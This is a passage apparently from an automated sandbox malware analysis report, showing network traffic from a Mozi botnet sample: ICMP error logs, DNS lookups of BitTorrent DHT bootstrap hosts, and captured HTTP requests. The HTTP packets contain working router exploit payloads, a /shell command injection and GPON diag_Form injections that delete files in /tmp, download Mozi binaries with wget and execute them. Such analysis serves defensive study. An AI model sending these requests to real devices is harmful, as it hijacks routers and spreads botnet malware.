                                                                                                        Jan 6, 2021 14:58:48.702986956 CET187.120.76.2192.168.2.2023d(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:49.645556927 CET199.167.17.231192.168.2.20d272(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:51.286541939 CET192.168.125.38192.168.2.20e28e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:51.286564112 CET192.168.125.38192.168.2.20e28e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:52.747682095 CET88.223.136.2192.168.2.2088a4(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:52.747703075 CET88.223.136.2192.168.2.2088a4(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:52.747709990 CET88.223.136.2192.168.2.2088a4(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:54.271212101 CET178.122.114.84192.168.2.20e508(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:55.407197952 CET72.29.203.65192.168.2.204787(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:55.408761024 CET72.29.203.65192.168.2.204787(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:57.066504955 CET97.33.112.9192.168.2.204669(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:57.676419020 CET150.185.255.10192.168.2.203be5(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:00.184617996 CET143.90.159.222192.168.2.209a04(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:03.250766039 CET143.90.159.222192.168.2.209a04(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:06.679811001 CET189.34.128.26192.168.2.209d2b(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:07.505678892 CET129.16.2.234192.168.2.20b45a(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:07.851850986 CET88.223.136.2192.168.2.2088a4(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:10.520180941 CET87.152.114.5192.168.2.2016fd(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:10.665828943 CET38.104.32.250192.168.2.208d25(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:10.676132917 CET103.9.136.110192.168.2.20d3d1(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:10.676274061 CET200.230.1.241192.168.2.201897(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:10.709482908 CET43.246.162.37192.168.2.207199(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:11.027462959 CET69.27.128.217192.168.2.20824e(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:11.766310930 CET168.95.157.5192.168.2.20fa2d(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:17.493165016 CET46.59.216.67192.168.2.208ee5(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:17.644489050 CET154.95.78.148192.168.2.20a8d4(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:17.757843971 CET201.5.240.99192.168.2.2062a6(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.505208015 CET89.176.100.130192.168.2.202ba1(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.554302931 CET89.96.148.18192.168.2.20ad46(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.554344893 CET89.96.148.18192.168.2.20ad46(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.554364920 CET89.96.148.18192.168.2.20ad46(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.731389046 CET150.99.191.46192.168.2.201716(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:20.735325098 CET150.99.191.46192.168.2.201716(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:23.735385895 CET150.99.191.46192.168.2.201716(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:24.510142088 CET31.150.96.14192.168.2.2041d6(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:24.513714075 CET46.165.182.127192.168.2.2018fa(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:24.653232098 CET64.59.132.10192.168.2.20be92(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:29.913151026 CET24.90.241.64192.168.2.20c9d4(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.514869928 CET149.11.89.129192.168.2.20f068(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.516840935 CET134.97.128.247192.168.2.203d80(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:34.625603914 CET87.37.130.69192.168.2.205945(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:40.730858088 CET94.218.155.42192.168.2.2026b0(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:44.518047094 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:44.518091917 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.513344049 CET84.155.180.12192.168.2.2049e9(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.646914005 CET4.16.0.234192.168.2.20f5ee(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.674783945 CET193.203.0.195192.168.2.2080f7(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.686175108 CET189.130.236.65192.168.2.2069ac(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:45.749198914 CET14.0.9.94192.168.2.209339(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:47.518141985 CET109.224.192.76192.168.2.209c7(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:48.847505093 CET24.30.174.118192.168.2.201a40(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:53.739447117 CET112.188.185.146192.168.2.20cc8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:55.670149088 CET37.220.104.190192.168.2.20f5ad(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:59:55.767354012 CET41.210.241.47192.168.2.20a8de(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:59:59.587552071 CET131.125.10.4192.168.2.20dc5b(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:02.729523897 CET112.190.172.242192.168.2.20710a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:03.680546999 CET201.17.8.210192.168.2.20cf13(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:04.666235924 CET98.152.214.82192.168.2.201844(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:06.964167118 CET78.78.189.39192.168.2.20cb5d(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:07.070262909 CET185.214.76.18192.168.2.20d070(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:13.658998013 CET107.164.203.92192.168.2.20f6e1(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:15.163187027 CET79.104.247.43192.168.2.202bb0(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:17.600296974 CET72.26.212.10192.168.2.208912(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:17.600346088 CET72.26.212.10192.168.2.208912(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:22.038872957 CET212.55.211.226192.168.2.206d9e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:22.044158936 CET213.61.250.219192.168.2.2088b3(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:23.675431013 CET187.225.228.249192.168.2.2060c3(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:27.618696928 CET205.145.208.5192.168.2.205998(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:30.738457918 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:30.738495111 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:33.743341923 CET182.163.63.250192.168.2.20b55e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.533756018 CET92.192.4.224192.168.2.207dd2(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.755757093 CET221.134.65.145192.168.2.206870(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:34.799127102 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.799175978 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:34.799204111 CET181.224.188.111192.168.2.20323a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:35.946397066 CET149.11.89.129192.168.2.2073e8(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:37.687701941 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:37.687741041 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:40.478363037 CET149.11.89.129192.168.2.20233f(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:40.687676907 CET10.161.35.62192.168.2.20846(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.002551079 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.002592087 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.489645958 CET149.11.89.129192.168.2.20731d(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:41.790199041 CET210.171.224.224192.168.2.20c49b(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:44.002404928 CET182.48.81.78192.168.2.20639a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.505012035 CET149.11.89.129192.168.2.2051ab(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.528371096 CET92.210.243.211192.168.2.20f1a4(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.685467958 CET10.252.252.1192.168.2.20b0f4(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:44.711818933 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.711848021 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.739614010 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:44.739654064 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:45.510428905 CET149.11.89.129192.168.2.204d05(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:46.628890038 CET206.172.194.249192.168.2.20fb37(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:47.513242006 CET136.163.209.40192.168.2.20b51a(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.522638083 CET149.11.89.129192.168.2.2070cf(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.740329981 CET121.173.147.138192.168.2.2037a8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:47.879973888 CET10.5.4.1192.168.2.207a3c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:48.801064968 CET61.109.133.114192.168.2.20da42(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:00:51.547976017 CET89.228.14.10192.168.2.201ef8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:55.503956079 CET217.196.225.4192.168.2.20b937(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:55.656976938 CET64.59.150.30192.168.2.209d0d(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:58.623317957 CET24.215.105.193192.168.2.204276(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:00:59.538392067 CET217.92.141.24192.168.2.20d8dc(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:01.653841019 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:01.653906107 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:02.638355970 CET65.206.180.73192.168.2.20ff23(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:02.711278915 CET187.18.116.82192.168.2.20ef45(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.648133039 CET196.22.163.190192.168.2.203542(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727164030 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727220058 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:04.727247000 CET174.61.0.221192.168.2.20c531(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.140486002 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.140548944 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:07.141227007 CET196.218.192.105192.168.2.20e5d2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:08.469717026 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:08.469760895 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.641868114 CET216.221.97.226192.168.2.20a5da(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.663777113 CET203.116.7.190192.168.2.208f8e(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:09.792810917 CET109.197.243.33192.168.2.20dbe1(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:10.557548046 CET10.100.100.2192.168.2.20faf2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.459120035 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.459158897 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:11.759555101 CET10.45.129.110192.168.2.2052f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:12.536314011 CET90.80.66.54192.168.2.20a426(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:13.538855076 CET100.64.0.35192.168.2.20f962(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:14.698060036 CET187.120.48.29192.168.2.20ae66(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.298377991 CET140.114.3.30192.168.2.2033fb(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.654951096 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:15.654994965 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:16.513741970 CET87.148.141.21192.168.2.20c00f(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:18.655107021 CET10.99.11.2192.168.2.2081da(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:19.630877972 CET10.22.134.50192.168.2.20a0d1(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:23.515122890 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:23.519484043 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:23.678210020 CET41.79.148.162192.168.2.20566c(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:23.715193033 CET152.255.134.213192.168.2.2017f9(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 15:01:26.514965057 CET94.225.9.137192.168.2.202854(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:26.527113914 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:26.528310061 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:29.529879093 CET178.114.115.193192.168.2.201148(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:30.636097908 CET66.97.63.178192.168.2.2050b(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:30.778656960 CET222.227.19.236192.168.2.209f6b(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:32.010106087 CET122.210.220.65192.168.2.201727(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 15:01:33.529989958 CET193.203.0.195192.168.2.208da7(Net unreachable)Destination Unreachable

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Jan 6, 2021 14:57:45.387015104 CET192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.439794064 CET192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.489500046 CET192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.542176008 CET192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Jan 6, 2021 14:57:45.435297966 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.435297966 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.487713099 CET8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.540313959 CET8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.593162060 CET8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                        Jan 6, 2021 14:57:45.593162060 CET8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 23.44.146.105:80
                                                                                                        • 127.0.0.1:80
                                                                                                        • 107.170.200.206:80
                                                                                                        • 127.0.0.1:8080
                                                                                                        • 203.146.142.202:80
                                                                                                        • 14.250.195.170:49152
                                                                                                        • 54.164.156.191:80
                                                                                                        • 45.196.102.179:80
                                                                                                        • 34.117.168.156:80
                                                                                                        • 104.98.58.115:80
                                                                                                        • 23.218.46.16:80
                                                                                                        • 206.212.1.199:80
                                                                                                        • 192.155.170.244:80
                                                                                                        • 51.178.69.101:80
                                                                                                        • 184.31.173.81:80
                                                                                                        • 38.87.83.34:80
                                                                                                        • 23.218.148.138:80

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        0192.168.2.204798223.44.146.10580
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:57:26.185761929 CET10OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 23.44.146.105:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:57:26.486361027 CET11INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 207
                                                                                                        Expires: Wed, 06 Jan 2021 13:57:26 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:57:26 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 64 30 34 63 30 34 35 26 23 34 36 3b 31 36 30 39 39 34 31 34 34 36 26 23 34 36 3b 62 36 36 66 34 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ed04c045&#46;1609941446&#46;b66f4b</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        1192.168.2.205159235.168.169.8580
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:57:39.652837992 CET123OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:57:39.781816959 CET125INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:57:39 GMT
                                                                                                        Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                                                                                                        Content-Length: 216
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        10192.168.2.204677823.243.117.2038080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:35.732666969 CET414OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                        Jan 6, 2021 14:58:36.233577013 CET415OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                        Jan 6, 2021 14:58:36.837584972 CET425OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
